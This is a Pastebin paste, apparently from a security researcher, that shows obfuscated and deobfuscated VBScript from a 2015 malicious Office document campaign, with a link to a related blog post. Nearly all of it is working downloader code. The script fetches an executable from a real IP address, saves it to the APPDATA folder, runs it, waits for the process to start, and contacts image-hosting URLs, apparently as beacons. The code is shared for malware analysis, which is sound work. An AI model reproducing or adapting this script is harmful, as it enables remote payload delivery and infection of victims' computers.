bartblaze

Deobfuscated VBscript

May 8th, 2015
534
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. Obfuscated + deobfuscated VBscript used in latest Office maldoc campaign.
  2. Related blog post: http://bartblaze.blogspot.com/2015/05/new-malicious-office-docs-trick.html
  3.  
  4.  
  5. <== obfuscated: ===>
  6. dim HGyu87f7Usf: Set HGyu87f7Usf = createobject(Chr(77) & Chr(105) & Chr(99) & Chr(114) & Chr(111) & Chr(115) & Chr(111) & Chr(102) & Chr(116) & Chr(46) & Chr(88) & Chr(77) & Chr(76) & Chr(72) & Chr(84) & Chr(84) & Chr(80) )
  7. dim oUIOGuiwefff: Set oUIOGuiwefff = createobject(Chr(65) & Chr(100) & Chr(111) & Chr(100) & Chr(98) & Chr(46) & Chr(83) & Chr(116) & Chr(114) & Chr(101) & Chr(97) & Chr(109) )
  8. HGyu87f7Usf.Open "GET", "http://91.227.18.18/stat/get.php", False
  9. HGyu87f7Usf.Send
  10. Set dfgfderer = WScript.CreateObject(Chr(87) & Chr(83) & Chr(99) & Chr(114) & Chr(105) & Chr(112) & Chr(116) & Chr(46) & Chr(83) & Chr(104) & Chr(101) & Chr(108) & Chr(108) ).Environment(Chr(80) & Chr(114) & Chr(111) & Chr(99) & Chr(101) & Chr(115) & Chr(115) )
  11. iyUGbuwerff = dfgfderer(Chr(65) & Chr(80) & Chr(80) & Chr(68) & Chr(65) & Chr(84) & Chr(65) )
  12. iyUGUIvbuiwe7vhJ = iyUGbuwerff + Chr(92) & Chr(111) & Chr(56) & Chr(50) & Chr(51) & Chr(55) & Chr(52) & Chr(50) & Chr(51) & Chr(46) & Chr(101) & Chr(120) & Chr(101)  
  13. with oUIOGuiwefff
  14.    .type = 1  
  15.     .open
  16.     .write HGyu87f7Usf.responseBody
  17.     .savetofile iyUGUIvbuiwe7vhJ, 2  
  18. end with
  19. Set uyGUYhi8wef = CreateObject(Chr(83) & Chr(104) & Chr(101) & Chr(108) & Chr(108) & Chr(46) & Chr(65) & Chr(112) & Chr(112) & Chr(108) & Chr(105) & Chr(99) & Chr(97) & Chr(116) & Chr(105) & Chr(111) & Chr(110) )
  20. uyGUYhi8wef.Open iyUGUIvbuiwe7vhJ
  21.  
  22. dim JHyygUBjdfg: Set JHyygUBjdfg = createobject(Chr(77) & Chr(105) & Chr(99) & Chr(114) & Chr(111) & Chr(115) & Chr(111) & Chr(102) & Chr(116) & Chr(46) & Chr(88) & Chr(77) & Chr(76) & Chr(72) & Chr(84) & Chr(84) & Chr(80) )
  23. dim jhvHVKfdg: Set jhvHVKfdg = createobject(Chr(65) & Chr(100) & Chr(111) & Chr(100) & Chr(98) & Chr(46) & Chr(83) & Chr(116) & Chr(114) & Chr(101) & Chr(97) & Chr(109) )
  24. JHyygUBjdfg.Open Chr(71) & Chr(69) & Chr(84) , Chr(104) & Chr(116) & Chr(116) & Chr(112) & Chr(58) & Chr(47) & Chr(47) & Chr(115) & Chr(97) & Chr(118) & Chr(101) & Chr(112) & Chr(105) & Chr(99) & Chr(46) & Chr(111) & Chr(114) & Chr(103) & Chr(47) & Chr(55) & Chr(50) & Chr(54) & Chr(48) & Chr(52) & Chr(48) & Chr(54) & Chr(46) & Chr(106) & Chr(112) & Chr(103) , False
  25. JHyygUBjdfg.Send
  26.  
  27. Set fdhtrewfwef = GetObject(Chr(119) & Chr(105) & Chr(110) & Chr(109) & Chr(103) & Chr(109) & Chr(116) & Chr(115) & Chr(58) & Chr(92) & Chr(92) & Chr(46) & Chr(92) & Chr(114) & Chr(111) & Chr(111) & Chr(116) & Chr(92) & Chr(99) & Chr(105) & Chr(109) & Chr(118) & Chr(50) )
  28. Do
  29. Running = False
  30. Set colItems = fdhtrewfwef.ExecQuery(Chr(83) & Chr(101) & Chr(108) & Chr(101) & Chr(99) & Chr(116) & Chr(32) & Chr(42) & Chr(32) & Chr(102) & Chr(114) & Chr(111) & Chr(109) & Chr(32) & Chr(87) & Chr(105) & Chr(110) & Chr(51) & Chr(50) & Chr(95) & Chr(80) & Chr(114) & Chr(111) & Chr(99) & Chr(101) & Chr(115) & Chr(115) )
  31. For Each objItem In colItems
  32. If objItem.Name = Chr(111) & Chr(56) & Chr(50) & Chr(51) & Chr(55) & Chr(52) & Chr(50) & Chr(51) & Chr(46) & Chr(101) & Chr(120) & Chr(101)  Then
  33. Running = True
  34. Exit For
  35. End If
  36. Next
  37. If Not Running Then
  38. WScript.Sleep 3000
  39. End If
  40. Loop While Not Running
  41. dim sdfsdfsdf: Set sdfsdfsdf = createobject(Chr(77) & Chr(105) & Chr(99) & Chr(114) & Chr(111) & Chr(115) & Chr(111) & Chr(102) & Chr(116) & Chr(46) & Chr(88) & Chr(77) & Chr(76) & Chr(72) & Chr(84) & Chr(84) & Chr(80) )
  42. dim dsfsdfsdfg: Set dsfsdfsdfg = createobject(Chr(65) & Chr(100) & Chr(111) & Chr(100) & Chr(98) & Chr(46) & Chr(83) & Chr(116) & Chr(114) & Chr(101) & Chr(97) & Chr(109) )
  43. sdfsdfsdf.Open Chr(71) & Chr(69) & Chr(84) , Chr(104) & Chr(116) & Chr(116) & Chr(112) & Chr(58) & Chr(47) & Chr(47) & Chr(115) & Chr(97) & Chr(118) & Chr(101) & Chr(112) & Chr(105) & Chr(99) & Chr(46) & Chr(110) & Chr(101) & Chr(116) & Chr(47) & Chr(54) & Chr(56) & Chr(53) & Chr(54) & Chr(49) & Chr(52) & Chr(57) & Chr(46) & Chr(106) & Chr(112) & Chr(103) , False
  44. sdfsdfsdf.Send
  45.  
  46.  
  47. =========================================================================================================
  48.  
  49.  
  50.  
  51. <== deobfuscated: ===>
  52. dim HGyu87f7Usf: Set HGyu87f7Usf = createobject(Microsoft.XMLHTTP )
  53. dim oUIOGuiwefff: Set oUIOGuiwefff = createobject(Adodb.Stream )
  54. HGyu87f7Usf.Open "GET", "http://91.227.18.18/stat/get.php", False
  55. HGyu87f7Usf.Send
  56. Set dfgfderer = WScript.CreateObject(WScript.Shell ).Environment(Process )
  57. iyUGbuwerff = dfgfderer(APPDATA )
  58. iyUGUIvbuiwe7vhJ = iyUGbuwerff + \o8237423.exe
  59. with oUIOGuiwefff
  60.    .type = 1
  61.     .open
  62.     .write HGyu87f7Usf.responseBody
  63.     .savetofile iyUGUIvbuiwe7vhJ, 2
  64. end with
  65. Set uyGUYhi8wef = CreateObject(Shell.Application )
  66. uyGUYhi8wef.Open iyUGUIvbuiwe7vhJ
  67.  
  68. dim JHyygUBjdfg: Set JHyygUBjdfg = createobject(Microsoft.XMLHTTP )
  69. dim jhvHVKfdg: Set jhvHVKfdg = createobject(Adodb.Stream )
  70. JHyygUBjdfg.Open GET , http://savepic.org/7260406.jpg , False
  71. JHyygUBjdfg.Send
  72.  
  73. Set fdhtrewfwef = GetObject(winmgmts:\\.\root\cimv2 )
  74. Do
  75. Running = Falsepasteb
  76. Set colItems = fdhtrewfwef.ExecQuery(Select * from Win32_Process )
  77. For Each objItem In colItems
  78. If objItem.Name = o8237423.exe  Then
  79. Running = True
  80. Exit For
  81. End If
  82. Next
  83. If Not Running Then
  84. WScript.Sleep 3000
  85. End If
  86. Loop While Not Running
  87. dim sdfsdfsdf: Set sdfsdfsdf = createobject(Microsoft.XMLHTTP )
  88. dim dsfsdfsdfg: Set dsfsdfsdfg = createobject(Adodb.Stream )
  89. sdfsdfsdf.Open GET , http://savepic.net/6856149.jpg , False
  90. sdfsdfsdf.Send
RAW Paste Data